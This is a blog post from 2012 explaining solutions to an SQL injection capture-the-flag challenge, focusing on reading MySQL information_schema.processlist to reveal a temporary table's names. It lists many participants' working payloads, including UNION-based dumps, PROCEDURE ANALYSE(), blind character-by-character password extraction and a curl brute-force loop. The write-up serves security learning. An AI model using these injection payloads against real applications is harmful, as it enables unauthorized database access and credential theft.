Blog August 22, 2012

Solutions for challenge 2B

A detailed explanation of the SQL Injection challenge 2B and the many solutions used to solve this challenge.


After posting the solutions for challenge 2A from the series of SQL Injection challenges, it only made sense to continue with 2B, considering that 'B' is a slightly more difficult variation of 'A'. Challenge 2B is probably my favorite challenge because of its simplicity and because of how confusing it turned out to be for many participants.

 

Explanation

DISCLAIMER: If you haven't tried this challenge, it was originally available here (the challenge is no longer available online) in case you want to give it a shot before reading the SOLUTIONS below.

This challenge, like 2A, lets you log in as guest and sets a cookie named user_id, which is vulnerable to SQL Injection. Initially no filtering was applied, since the idea behind the challenge was to come up with different ways of retrieving the table and column names. What makes this challenge tricky is that it stores the credentials in a temporary table, and that temporary table only exists for the duration of the PHP script's execution. Temporary tables do not appear in information_schema.tables or information_schema.columns, so this was the perfect way of forcing participants to find other methods for obtaining the table and column names.

The intended solution is to use information_schema.processlist, which is available starting from MySQL 5.1. The info column of that table holds the statement each connection is currently executing, and the injected query is itself one of those statements, so a union select info from information_schema.processlist returns the complete original query, table and column names included. This can be extremely useful when table_name or column_name are being blocked by a WAF/IDS. Two details worth keeping in mind: the UNION has to select the same number of columns as the original query, and an account without the PROCESS privilege only sees its own connections, which is all that is needed here; adding where id=connection_id() makes sure you read your own statement rather than whatever thread happens to be listed first.

Example

-1 union select info,2 from information_schema.processlist

SELECT websec_rocks_temp_username, websec_rocks_temp_user_priv FROM websec_rocks_temp_uzuAr1Os WHERE websec_rocks_temp_user_id = -1 union select info,2 from information_schema.processlist

The literal 2 pads the UNION to the two columns of the original SELECT; without it MySQL rejects the statement because the two SELECTs have a different number of columns.

Challenge Modifications

After w00d's and Miroslav's solutions, I made two slight adjustments to the challenge so that it would be solved as intended. W00d's solution used PROCEDURE ANALYSE(), which lists the column names of the result set, so I decided to block the word 'PROCEDURE', since this method is already documented on The SQL Injection KB; w00d later submitted a solution using the intended method. As for Miroslav, he found the column name through a dictionary attack using the txt/common-columns.txt file from sqlmap. The second modification was to change the column names so they could no longer be guessed.

 

Solutions

NULL Life CTF TEAM:

user_id= 3 union select 1,2,concat_ws(0x3a,command,time,state,info),4 from information_schema.processlist limit 1-- -

Raz0r:

user_id=-1+union+select+1,2,INFO,4+FROM+information_schema.PROCESSLIST+LIMIT+1--+-

user_id=0+and+IF(ORD(MID(temp_password,0,1))+BETWEEN+0+AND+255,1,(select+1+union+select+2))--+-

w00d:

curl -i http://50.57.51.240/challenges/2B/challenge.php --cookie "user_id=0 limit 3,1 PROCEDURE ANALYSE()"

curl -i http://50.57.51.240/challenges/2B/challenge.php --cookie "user_id=-1 union select group_concat(info),2 from information_schema.processlist"

Miroslav Stampar:

1 OR LENGTH()>0 LIMIT 0,1

user_id=0 AND ORD(MID(temp_password,17,1))>1 LIMIT 0,1

g4mm4:

user_id=-1 union select info,'padding' from information_schema.processlist#

Dominus:

user_id=0+and+1=0+union+select+1,unhex(hex(concat_ws(0x3a,info,state)))+from information_schema.processlist limit 0,1

user_id=0 and websec_rocks_temp_password like 'a%'

mortis:

Used processlist

user_id=0 and websec_rocks_temp_password like '%'

Karion:

Used processlist

for i in {4,5,6,7} ; do for j in {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} ; do curl http://50.57.51.240/challenges/2B/challenge.php -b "user_id=-9 or websec_rocks_temp_password LIKE 0x454c5f4d55595f56455247${i}${j}25" 2>&1 | grep ADMIN ; echo $i$j ;done; done

BlackFan:

user_id=-1 union select info,2 from information_schema.processlist limit 1;

user_id=0 and (@:=websec_rocks_temp_password) union select @,1;

gijs:

user_id=5 UNION select 1,(select info from information_schema.processlist LIMIT 1)

Same script from challenge 2A.

MisterJyu:

Used processlist

if(mid(binary(websec_rocks_temp_password),1,1)='a',0,1)

Submitted a Python script found here.

Nurfed:

user_id=-1 union select 1,info from information_schema.PROCESSLIST limit 0,1#

user_id=0 and LENGTH(websec_rocks_temp_password)=16#

user_id=0 and websec_rocks_temp_password like 0x25656c5f6d75795f76657267756974617325#

 

A full list of the victors for each challenge is available here.

 
